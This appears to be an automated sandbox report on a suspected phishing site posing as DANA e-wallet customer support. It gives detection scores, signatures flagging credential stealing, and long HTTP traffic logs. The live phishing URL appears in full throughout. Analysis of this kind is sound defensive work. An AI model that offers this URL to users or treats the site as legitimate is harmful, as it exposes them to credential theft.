Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://bantuan-customer-care-dana.officio.asia/

Overview

General Information

Sample URL:https://bantuan-customer-care-dana.officio.asia/
Analysis ID:1532632
Tags:openphish
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
HTML body contains low number of good links
HTML body contains password input but no form action

Classification

  • System is w10x64
  • chrome.exe (PID: 2924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5440 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 --field-trial-handle=2320,i,17996028605859192159,13445879182102012152,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6360 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bantuan-customer-care-dana.officio.asia/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://bantuan-customer-care-dana.officio.asia/SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Source: https://bantuan-customer-care-dana.officio.asia/Virustotal: Detection: 15%Perma Link
Source: https://bantuan-customer-care-dana.officio.asia/HTTP Parser: Number of links: 0
Source: https://bantuan-customer-care-dana.officio.asia/HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://bantuan-customer-care-dana.officio.asia/HTTP Parser: <input type="password" .../> found
Source: https://bantuan-customer-care-dana.officio.asia/HTTP Parser: No favicon
Source: https://bantuan-customer-care-dana.officio.asia/HTTP Parser: No favicon
Source: https://bantuan-customer-care-dana.officio.asia/HTTP Parser: No <meta name="author".. found
Source: https://bantuan-customer-care-dana.officio.asia/HTTP Parser: No <meta name="author".. found
Source: https://bantuan-customer-care-dana.officio.asia/HTTP Parser: No <meta name="copyright".. found
Source: https://bantuan-customer-care-dana.officio.asia/HTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/8d62ea654fcf0e4cae001e344ee2592c.css HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bantuan-customer-care-dana.officio.asia/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.5.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bantuan-customer-care-dana.officio.asia/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/00b9d2e9f52e505c013c16bb638a42a4.css HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bantuan-customer-care-dana.officio.asia/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/6990a7033bbaeadc2040ac863ff124fd.css HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bantuan-customer-care-dana.officio.asia/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/3fadc676582b9542004b502ee03df3a3.css HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bantuan-customer-care-dana.officio.asia/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/47e4c58f6b9789b8a33f2525cf084599.css HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bantuan-customer-care-dana.officio.asia/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/img/dana_logo.png HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bantuan-customer-care-dana.officio.asia/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/img/hero.png HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bantuan-customer-care-dana.officio.asia/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.5.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/img/dana_logo.png HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/img/dana_text.png HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bantuan-customer-care-dana.officio.asia/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/img/bi.png HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bantuan-customer-care-dana.officio.asia/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/img/kom.png HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bantuan-customer-care-dana.officio.asia/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/jquery.mask.min.js HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bantuan-customer-care-dana.officio.asia/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/img/load_bg.png HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bantuan-customer-care-dana.officio.asia/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/img/load_spin.png HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bantuan-customer-care-dana.officio.asia/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/img/dana_text.png HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/jquery.mask.min.js HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/img/load_bg.png HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/img/kom.png HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/img/load_spin.png HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/img/bi.png HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ast/img/indo.png HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bantuan-customer-care-dana.officio.asia/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /ast/img/indo.png HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bantuan-customer-care-dana.officio.asiaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bantuan-customer-care-dana.officio.asia/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pXuLpORe9MOP3X4&MD=FYonS417 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pXuLpORe9MOP3X4&MD=FYonS417 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
